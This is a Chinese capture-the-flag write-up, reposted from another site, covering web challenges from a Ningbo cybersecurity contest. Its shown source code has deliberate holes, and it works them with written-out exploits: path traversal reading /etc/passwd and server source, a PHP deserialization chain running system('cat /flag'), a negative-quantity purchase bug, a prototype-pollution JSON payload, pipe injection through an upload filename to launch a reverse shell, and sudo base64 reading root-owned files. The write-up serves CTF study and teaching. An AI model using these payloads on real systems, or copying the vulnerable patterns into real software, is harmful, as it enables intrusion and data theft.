文件读取，拿到源码

show.php?file=/etc/passwd

#show.php
<?php
if&nbsp;(isset($_GET['file']))%20{
&nbsp;%20&nbsp;&nbsp;$imagePath&nbsp;=&nbsp;$_GET['file'];
&nbsp;%20&nbsp;&nbsp;if&nbsp;(preg_match("/(\/flag|\/fl|\/f|sort|index\.php|show\.php|\.\.\/|\.\/|\/)/i",&nbsp;$imagePath)){
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;&nbsp;$imagePath&nbsp;=&nbsp;'img/1.png';
&nbsp; &nbsp; }
}
$imageData&nbsp;= file_get_contents($imagePath);

if&nbsp;($imageData&nbsp;!==&nbsp;false) {

&nbsp; &nbsp;&nbsp;$finfo&nbsp;= finfo_open(FILEINFO_MIME_TYPE);
&nbsp; &nbsp;&nbsp;$mimeType&nbsp;= finfo_buffer($finfo,&nbsp;$imageData);
&nbsp; &nbsp; finfo_close($finfo);

&nbsp; &nbsp; header("Content-Type:&nbsp;$mimeType");

&nbsp; &nbsp;&nbsp;echo$imageData;
&nbsp; &nbsp;&nbsp;exit;
}&nbsp;else&nbsp;{
&nbsp; &nbsp;&nbsp;echo"Image cannot be read.";
}

#index.php
<?php
// 启动 session
session_start();

Class Dog {
&nbsp; &nbsp; public&nbsp;$bone;
&nbsp; &nbsp; public&nbsp;$meat;
&nbsp; &nbsp; public&nbsp;$beef;
&nbsp; &nbsp; public&nbsp;$candy;
&nbsp; &nbsp; public&nbsp;function__invoke() {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;((md5($this->meat) == md5($this->beef)) && ($this->meat !=&nbsp;$this->beef)) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return$this->candy->flag;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; }

&nbsp; &nbsp; public&nbsp;function__toString() {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$function&nbsp;=&nbsp;$this->bone;
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return$function();
&nbsp; &nbsp; }
}

CLass mouse {
&nbsp; &nbsp; public&nbsp;$rice;

&nbsp; &nbsp; public&nbsp;function&nbsp;__get($key) {
&nbsp; &nbsp; &nbsp; &nbsp; @eval($this->rice);
&nbsp; &nbsp; }
}

class Cat {
&nbsp; &nbsp; public&nbsp;$fish;
&nbsp; &nbsp; public&nbsp;function__construct() {
&nbsp; &nbsp; }

&nbsp; &nbsp; public&nbsp;function__destruct() {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;echo$this->fish;
&nbsp; &nbsp; }
}

// 处理文件上传
$message&nbsp;=&nbsp;'';
$success&nbsp;=&nbsp;false;
if&nbsp;($_SERVER['REQUEST_METHOD'] ===&nbsp;'POST') {
&nbsp; &nbsp;&nbsp;if&nbsp;(isset($_FILES['uploaded_file'])) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$uploadDir&nbsp;= __DIR__ .&nbsp;'/uploads/';
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$uploadedFile&nbsp;=&nbsp;$uploadDir&nbsp;. basename($_FILES['uploaded_file']['name']);

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(move_uploaded_file($_FILES['uploaded_file']['tmp_name'],&nbsp;$uploadedFile)) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$message&nbsp;=&nbsp;'上传成功！';
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$success&nbsp;=&nbsp;true;

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$fileContent&nbsp;= file_get_contents($uploadedFile);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; @unlink($uploadedFile);

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; @unserialize($fileContent);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$fileContent&nbsp;=&nbsp;"";

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; // 设置 session，表示上传成功
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$_SESSION['upload_success'] =&nbsp;true;

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; // 重定向，防止刷新页面时重复提交表单
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; header("Location: "&nbsp;.&nbsp;$_SERVER['PHP_SELF']);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;echo$message;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;exit();
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; }
}
?>
<!DOCTYPE html>
<html lang="zh-CN">
<head>
&nbsp; &nbsp; <meta charset="UTF-8">
&nbsp; &nbsp; <title>壁纸上传网站</title>
&nbsp; &nbsp; <style>
&nbsp; &nbsp; &nbsp; &nbsp; body {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; background: linear-gradient(135deg,&nbsp;#000000,&nbsp;#ffffff);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; font-family: Arial, sans-serif;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; color:&nbsp;#333;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; display: flex;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; justify-content: center;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; align-items: center;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; height: 100vh;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; margin: 0;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; .container {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; text-align: center;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; background: rgba(255, 255, 255, 0.9);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; padding: 30px;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; border-radius: 10px;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; box-shadow: 0 0 15px rgba(0,0,0,0.2);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; width: 400px;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; h1 {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; font-size: 24px;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; margin-bottom: 20px;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; color:&nbsp;#000;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; .message {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; font-size: 18px;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; color: green;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; margin-bottom: 20px;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; input[type="file"] {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; margin: 20px 0;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; font-size: 16px;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; input[type="submit"] {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; background-color:&nbsp;#333;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; color:&nbsp;#fff;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; border: none;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; padding: 10px 20px;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; cursor: pointer;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; border-radius: 5px;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; input[type="submit"]:hover {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; background-color:&nbsp;#555;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; .images {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; margin-top: 40px;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; .images-title {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; font-size: 20px;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; font-weight: bold;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; margin-bottom: 20px;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; color:&nbsp;#444;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; .image-item {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; display: inline-block;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; margin: 0 10px;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; .image-item img {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; width: 150px;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; height: 150px;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; border-radius: 10px;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; border: 2px solid&nbsp;#333;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; transition: transform 0.3s;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; .image-item img:hover {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; transform: scale(1.1);
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; .image-item a {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; display: block;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; margin-top: 10px;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; color:&nbsp;#333;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; text-decoration: none;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; font-weight: bold;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; .image-item a:hover {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; color:&nbsp;#555;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; </style>
&nbsp; &nbsp; <script>
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;functionshowSuccessAlert() {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; alert("文件上传成功！");
&nbsp; &nbsp; &nbsp; &nbsp; }

&nbsp; &nbsp; &nbsp; &nbsp; // 页面加载后检查是否上传成功
&nbsp; &nbsp; &nbsp; &nbsp; window.onload =&nbsp;function() {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <?php&nbsp;if&nbsp;(isset($_SESSION['upload_success']) &&&nbsp;$_SESSION['upload_success']) : ?>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; showSuccessAlert();
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <?php
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; // 清除 session 中的上传成功状态
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;unset($_SESSION['upload_success']);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; endif;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ?>
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; </script>
</head>
<body>
<div class="container">
&nbsp; &nbsp; <h1>壁纸上传网站</h1>
&nbsp; &nbsp; <?php&nbsp;if&nbsp;(!empty($message)) : ?>
&nbsp; &nbsp; &nbsp; &nbsp; <div class="message"><?php&nbsp;echo$message; ?></div>
&nbsp; &nbsp; <?php endif; ?>
&nbsp; &nbsp; <form action=""&nbsp;method="post"&nbsp;enctype="multipart/form-data">
&nbsp; &nbsp; &nbsp; &nbsp; <input&nbsp;type="file"&nbsp;name="uploaded_file"&nbsp;required>
&nbsp; &nbsp; &nbsp; &nbsp; <br>
&nbsp; &nbsp; &nbsp; &nbsp; <input&nbsp;type="submit"&nbsp;value="上传">
&nbsp; &nbsp; </form>

&nbsp; &nbsp; <div class="images">
&nbsp; &nbsp; &nbsp; &nbsp; <div class="images-title">精美壁纸如下：</div>

&nbsp; &nbsp; &nbsp; &nbsp; <!-- 图片 1 -->
&nbsp; &nbsp; &nbsp; &nbsp; <div class="image-item">
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <img src="./img/1.png"&nbsp;alt="壁纸1">
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <a href="/show.php?file=img/1.png"&nbsp;target="_blank">壁纸1</a>
&nbsp; &nbsp; &nbsp; &nbsp; </div>

&nbsp; &nbsp; &nbsp; &nbsp; <!-- 图片 2 -->
&nbsp; &nbsp; &nbsp; &nbsp; <div class="image-item">
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <img src="./img/2.png"&nbsp;alt="壁纸2">
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <a href="/show.php?file=img/2.png"&nbsp;target="_blank">壁纸2</a>
&nbsp; &nbsp; &nbsp; &nbsp; </div>

&nbsp; &nbsp; </div>
</div>
</body>
</html>

上传文件后会将文件内容反序列化 exp 如下

<?php
Class Dog {
&nbsp; &nbsp; public&nbsp;$bone;
&nbsp; &nbsp; public&nbsp;$meat;
&nbsp; &nbsp; public&nbsp;$beef;
&nbsp; &nbsp; public&nbsp;$candy;
}

CLass mouse {
&nbsp; &nbsp; public&nbsp;$rice;
}

class Cat {
&nbsp; &nbsp; public&nbsp;$fish;
&nbsp; &nbsp; public&nbsp;function&nbsp;__construct($fish) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$this->fish =&nbsp;$fish;
&nbsp; &nbsp; }}
$m&nbsp;= new mouse();
$m&nbsp;-> rice =&nbsp;"system('cat /flag');";
$d&nbsp;= new Dog();
$d&nbsp;-> meat =&nbsp;'240610708';
$d&nbsp;-> beef =&nbsp;'QNKCDZO';
$d&nbsp;-> bone =&nbsp;$d;
$d&nbsp;-> candy =&nbsp;$m;
$c&nbsp;= new Cat($d);
echo&nbsp;(serialize($c));
//O:3:"Cat":1:{s:4:"fish";O:3:"Dog":4:{s:4:"bone";r:2;s:4:"meat";s:9:"240610708";s:4:"beef";s:7:"QNKCDZO";s:5:"candy";O:5:"mouse":1:{s:4:"rice";s:20:"system('cat /flag');";}}}

上传拿到 FLAG

Easy_shop

队友看的这题做完忘截图，比赛时赛方直接提示了读 app.js 拿源码。赛后根据源码复盘一下思路

一看肯定要买 FLAG，但 MONEY 不够通过购买负数的形式增加余额

/buy/2?quantity=-100

再购买 FLAG，提示了一个路由

访问路由

发现存在任意文件读取漏洞

fileName=../../../etc/passwd

读取 FLAG 提示“你还真读FLAG啊”，于是尝试读源码

fileName=../server.js

源码如下

const express = require('express');
const app = express();
const fs = require('fs');
const port = 3000;
const bodyParser = require('body-parser');

app.set('view engine', 'ejs');
app.use(express.static('public'));
app.use(bodyParser.urlencoded({ extended: true }));

let money = 1000;
const initialMoney = 1000;
let message = '';
const products = [
  { name: '帽子', price: 10 },
  { name: '棒球', price: 15 },
  { name: 'iphone', price: 150 },
  { name: 'flag', price: 1500 },
];

app.get('/showflag', (req, res) => {
  res.render('readfile');
});

app.post('/readfile', (req, res) => {
  const fileName = req.body.fileName;

if (fileName.includes("fl")) {
    return res.status(200).send('你还真读flag啊');
  }
  fs.readFile("/app/public/"+fileName, 'utf8', (err, data) => {
    if (err) {
      res.status(500).send('Error reading the file');
    } else {
      res.send(data);
    }
  });
});

app.get('/', (req, res) => {
  res.render('index', { products, money, message });
});

app.get('/buy/:productIndex', (req, res) => {
  const productIndex = req.params.productIndex;
let quantity = req.query.quantity || 1;

if (productIndex === '3') {
    quantity = Math.abs(quantity);
    if (products[productIndex] && money >= products[productIndex].price * quantity) {
      money -= products[productIndex].price * quantity;
      message = `购买flag成功啦！给你/showflag这个路由，听说那里面有flag`;

      res.render('index', { products, money, message, showAlert: true });
    } else {
      message = 'flag很贵的';
      res.redirect('/');
    }
  }else{
    if (products[productIndex] && money >= products[productIndex].price * quantity) {
      money -= products[productIndex].price * quantity;
      message = `成功购买了 ${quantity} 件 "${products[productIndex].name}"！`;

      res.render('index', { products, money, message, showAlert: true });
    } else {
      message = '购买失败，钱不够啊老铁.';
      res.redirect('/');
    }
  }
});

function copy(object1, object2) {
if (typeof object1 !== 'object' || object1 === null ||
      typeof object2 !== 'object' || object2 === null) {
    return;
  }

for (let key in object2) {
    if (
      typeof object2[key] === 'object' &&
      object2[key] !== null &&
      typeof object1[key] === 'object' &&
      object1[key] !== null
    ) {
      copy(object1[key], object2[key]);
    } else {
      object1[key] = object2[key];
    }
  }
}

app.post('/getflag', require('body-parser').json(), function (req, res, next) {
  res.type('html');
  const flagFilePath = '/flag';
let flag = '';
  fs.readFile(flagFilePath, 'utf8', (err, data) => {
    if (err) {
      console.error(`无法读取文件: ${flagFilePath}`);
    } else {
      flag = data;
      var secert = {};
      var sess = req.session;
      let user = {};
      copy(user, req.body);
      if (secert.testattack === 'admin') {
        res.end(flag);

      } else {
        return res.send("no,no,no!");
      }
    }
  });
});

app.get('/reset', (req, res) => {
  money = initialMoney;
  message = '';
  res.redirect('/');
});

app.listen(port, () => {
  console.log(`Server is running on http://localhost:${port}`);
});

quantity 什么也没处理就乘，导致了逻辑漏洞

money -= products[productIndex].price * quantity;

接下来就是最基础的原型链污染，都是基于 Object的原型，直接污染即可

{"__proto__":{"testattack":"admin"}}

img2base64

复现，源码如下

import os
import re
import subprocess
from flask import Flask, request, render_template, jsonify

app = Flask(__name__)

UPLOAD_FOLDER = 'uploads/'
if not os.path.exists(UPLOAD_FOLDER):
    os.makedirs(UPLOAD_FOLDER)

app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
def checkname(filename):
&nbsp; &nbsp; ILLEGAL_CHARACTERS = r"[*=&\"%;<>iashto!@()\{\}\[\]_^`\'~\\#]"
&nbsp; &nbsp; noip = re.compile(r"\d+\.\d+")
&nbsp; &nbsp;&nbsp;if&nbsp;re.search(ILLEGAL_CHARACTERS, filename):
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;False
&nbsp; &nbsp;&nbsp;if".."in&nbsp;filename :
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;False
&nbsp; &nbsp;&nbsp;if(noip.findall(filename)):
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;False

@app.route('/')
def upload_form():
&nbsp; &nbsp;&nbsp;return&nbsp;render_template('upload.html')

@app.route('/upload', methods=['POST'])
def upload_file():
&nbsp; &nbsp;&nbsp;if'file'&nbsp;not&nbsp;in&nbsp;request.files:
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;jsonify({"error":&nbsp;"No file part in the request"}), 400

&nbsp; &nbsp; file = request.files['file']
&nbsp; &nbsp;&nbsp;if&nbsp;file.filename ==&nbsp;'':
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;jsonify({"error":&nbsp;"No file selected"}), 400
&nbsp; &nbsp;&nbsp;if(checkname(file.filename)==False):
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;jsonify({"error":&nbsp;"Not hacking!"}), 500
&nbsp; &nbsp;&nbsp;if&nbsp;file:
&nbsp; &nbsp; &nbsp; &nbsp; file_path = os.path.join(app.config['UPLOAD_FOLDER'], file.filename)
&nbsp; &nbsp; &nbsp; &nbsp; file.save(file_path)
&nbsp; &nbsp; &nbsp; &nbsp; result = subprocess.run(f"cat {file_path} | base64", shell=True, capture_output=True, text=True)
&nbsp; &nbsp; &nbsp; &nbsp; encoded_string = result.stdout.strip()
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;jsonify({
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"filename": file.filename,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"base64": encoded_string
&nbsp; &nbsp; &nbsp; &nbsp; })

if&nbsp;__name__ ==&nbsp;'__main__':
&nbsp; &nbsp; app.run(host='0.0.0.0',port=5000)

Python subprocess.run() 命令执行，程序会先进行文件上传，对上传的内容不进行任何检测，直接保存至 uploads/目录下，对上传 filename检测拼接 uploads/+filename传给 run 进行命令执行

@app.route('/upload', methods=['POST'])
def upload_file():
    if'file' not in request.files:
        return jsonify({"error": "No file part in the request"}), 400
    file = request.files['file']
    if file.filename == '':
        return jsonify({"error": "No file selected"}), 400
    if(checkname(file.filename)==False):
        return jsonify({"error": "Not hacking!"}), 500
    if file:
        file_path = os.path.join(app.config['UPLOAD_FOLDER'], file.filename)
        file.save(file_path)
        result = subprocess.run(f"cat {file_path} | base64", shell=True, capture_output=True, text=True)
        encoded_string = result.stdout.strip()
        return jsonify({
            "filename": file.filename,
            "base64": encoded_string
        })

WAF 过滤了 * = & " % ; < > i a s h t o ! @ ( ) { } [ ] _ ^ ' ~ &nbsp;\ #，没有过滤 |，用管道符插入 RCE

app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
def checkname(filename):
&nbsp; &nbsp; ILLEGAL_CHARACTERS = r"[*=&\"%;<>iashto!@()\{\}\[\]_^`\'~\\#]"
&nbsp; &nbsp; noip = re.compile(r"\d+\.\d+")
&nbsp; &nbsp;&nbsp;if&nbsp;re.search(ILLEGAL_CHARACTERS, filename):
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;False
&nbsp; &nbsp;&nbsp;if&nbsp;".."&nbsp;in&nbsp;filename :
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;False
&nbsp; &nbsp;&nbsp;if(noip.findall(filename)):
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;False

执行一下 pwd 试试，||前错后执行，cat 尝试读目录必定报错

cat .||pwd

i a s h t o ..这些字符不能用，无法直接在 filename看目录、查文件，但之前看到文件内容是完全不做检测的，subprocess.run设置 shell=true直接启动 shell 环境，且变量可用，$0是 Shell 的位置参数

文件内写入反弹 shell

在通过管道符执行，完成反弹 shell

cat uploads/111|$0|base64

比赛环境内网 FLAG 为 ROOT 权限，sudo -l有 base64，用 base64 读取 FLAG 文件即可，赛后就不模拟这个环境了

sudo base64 "$LFILE" | base64 --decode

genshop

源码如下

from flask import Flask, request, send_file
import socket

app = Flask("webserver")

@app.route('/', methods=["GET"])
def index():
    return send_file(__file__)

@app.route('/nc', methods=["POST"])
def nc():
    try:
        dstport = int(request.form['port'])
        data = request.form['data']
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(1)
        s.connect(('127.0.0.1', dstport))
        s.send(data.encode())
        recvdata = b''
        while True:
            chunk = s.recv(2048)
            if not chunk.strip():
                break
            else:
                recvdata += chunk
                continue
        return recvdata
    except Exception as e:
        return str(e)

app.run(host="0.0.0.0", port=8080, threaded=True)

提供了 socket 连接服务，被限制访问在 127.0.0.1，应该没法直接反弹 Shell，可能题目内部设置了别的服务，内网探测之后组合利用漏洞，推测思路是这样，但没环境不好复现了

参考：

https://xz.aliyun.com/news/14369 https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape/

免责声明 本文章所涉及仅供技术研究和学习之用。所有操作仅在合法授权的环境中进行，绝不用于任何非法活动。作者对因本文章内容导致的任何后果不承担责任。请读者务必遵守相关法律法规，合理使用本知识。

如对于文章中的技术细节有疑问、题目附件有需要，欢迎私信我，我会尽量帮助解答。期待与您的交流！

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：赛查查 《第八届宁波市网络安全大赛 初赛与决赛 Writeup》